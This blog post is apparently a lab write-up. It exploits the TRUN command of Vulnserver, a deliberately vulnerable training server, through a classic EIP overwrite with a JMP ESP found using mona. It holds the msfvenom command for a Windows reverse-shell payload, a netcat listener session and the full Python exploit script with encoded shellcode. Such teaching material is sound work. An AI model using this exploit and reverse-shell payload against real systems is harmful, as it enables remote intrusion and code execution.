304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

Vulnserver TRUN – This Time, We Go Vanilla (EIP)

This post will be a little shorter, but I wanted to finish up my vulnserver TRUN exploit paths.

Vulnserver TRUN – Introduction

If you haven’t read my previous write-up on the “TRUN” command, then I suggest you start with that one.

This exploit will pick up somewhere in the middle of the last one, with a different exploit path.

In this case, I will go with the standard vanilla EIP overwrite with a JMP ESP. For another example, you can visit the following write-up.

Finding the Jump

First, I started by taking a look at the modules again.

Vulnserver TRUN - Modules

In this case, I decided to use the essfunc.dll, as I would not need to worry about null bytes.

Next, I used mona to search for a JMP ESP in the library.

!mona find -s "\xff\xe4" -m essfunc.dll    (ff e4 = JMP ESP)

Vulnserver TRUN - JMP ESP

Verifying the Jump

I selected one of the instructions randomly (0x625011af), and updated my payload.

buffer += "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\xcc" * (5000 - len(buffer))

As you can see, the breakpoint was hit as expected.

Vulnserver TRUN - Breakpoint

Additionally, the stack has my interrupts, so the exploit can now be finished!

Vulnserver TRUN - Stack

Reverse Shell

With my skeleton in place, I generated some reverse shellcode to connect back to me.

[email protected]:~/vulnserver# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -b "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes

Once I added the new shellcode to my exploit, I resent the full payload.

[email protected]:~/vulnserver# python
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

As you can see, I was able to catch the reverse shell and complete the exploit!

[email protected]:~/vulnserver# nc -lvp 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Downloads\vulnserver-master> whoami


Vulnserver TRUN - Reverse Shell

Additionally, the server was not crashing at all, as seen in the following screenshot.

Vulnserver TRUN - Server

Final Code

Here is the final exploit that I used for my reverse shell.


import socket
import os
import sys

host = ""
port = 9999

buf =  ""
buf += "\xbe\x97\x7c\x63\x8e\xdb\xc8\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x77\x12\x83\xef\xfc\x03\xe0\x72\x81"
buf += "\x7b\xf2\x63\xc7\x84\x0a\x74\xa8\x0d\xef\x45\xe8\x6a"
buf += "\x64\xf5\xd8\xf9\x28\xfa\x93\xac\xd8\x89\xd6\x78\xef"
buf += "\x3a\x5c\x5f\xde\xbb\xcd\xa3\x41\x38\x0c\xf0\xa1\x01"
buf += "\xdf\x05\xa0\x46\x02\xe7\xf0\x1f\x48\x5a\xe4\x14\x04"
buf += "\x67\x8f\x67\x88\xef\x6c\x3f\xab\xde\x23\x4b\xf2\xc0"
buf += "\xc2\x98\x8e\x48\xdc\xfd\xab\x03\x57\x35\x47\x92\xb1"
buf += "\x07\xa8\x39\xfc\xa7\x5b\x43\x39\x0f\x84\x36\x33\x73"
buf += "\x39\x41\x80\x09\xe5\xc4\x12\xa9\x6e\x7e\xfe\x4b\xa2"
buf += "\x19\x75\x47\x0f\x6d\xd1\x44\x8e\xa2\x6a\x70\x1b\x45"
buf += "\xbc\xf0\x5f\x62\x18\x58\x3b\x0b\x39\x04\xea\x34\x59"
buf += "\xe7\x53\x91\x12\x0a\x87\xa8\x79\x43\x64\x81\x81\x93"
buf += "\xe2\x92\xf2\xa1\xad\x08\x9c\x89\x26\x97\x5b\xed\x1c"
buf += "\x6f\xf3\x10\x9f\x90\xda\xd6\xcb\xc0\x74\xfe\x73\x8b"
buf += "\x84\xff\xa1\x1c\xd4\xaf\x19\xdd\x84\x0f\xca\xb5\xce"
buf += "\x9f\x35\xa5\xf1\x75\x5e\x4c\x08\x1e\xa1\x39\x12\xdf"
buf += "\x49\x38\x12\xce\xd5\xb5\xf4\x9a\xf5\x93\xaf\x32\x6f"
buf += "\xbe\x3b\xa2\x70\x14\x46\xe4\xfb\x9b\xb7\xab\x0b\xd1"
buf += "\xab\x5c\xfc\xac\x91\xcb\x03\x1b\xbd\x90\x96\xc0\x3d"
buf += "\xde\x8a\x5e\x6a\xb7\x7d\x97\xfe\x25\x27\x01\x1c\xb4"
buf += "\xb1\x6a\xa4\x63\x02\x74\x25\xe1\x3e\x52\x35\x3f\xbe"
buf += "\xde\x61\xef\xe9\x88\xdf\x49\x40\x7b\x89\x03\x3f\xd5"
buf += "\x5d\xd5\x73\xe6\x1b\xda\x59\x90\xc3\x6b\x34\xe5\xfc"
buf += "\x44\xd0\xe1\x85\xb8\x40\x0d\x5c\x79\x70\x44\xfc\x28"
buf += "\x19\x01\x95\x68\x44\xb2\x40\xae\x71\x31\x60\x4f\x86"
buf += "\x29\x01\x4a\xc2\xed\xfa\x26\x5b\x98\xfc\x95\x5c\x89"

buffer = "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\x90" * 16
buffer += buf
buffer += "\x90" * (5000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print s.recv(1024)

print "[+] Sending exploit..."

s.send("TRUN  /.../" + buffer)

print s.recv(1024)


Vulnserver TRUN – Conclusion

This finishes up the TRUN command, although this exploit was obviously easier than the last one.

I’m hoping to finish up the rest of the commands soon, but that might have to wait for some other posts.

You can find the final exploit in my GitHub repository, but let me know if you think there is anything that I should add.

One comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.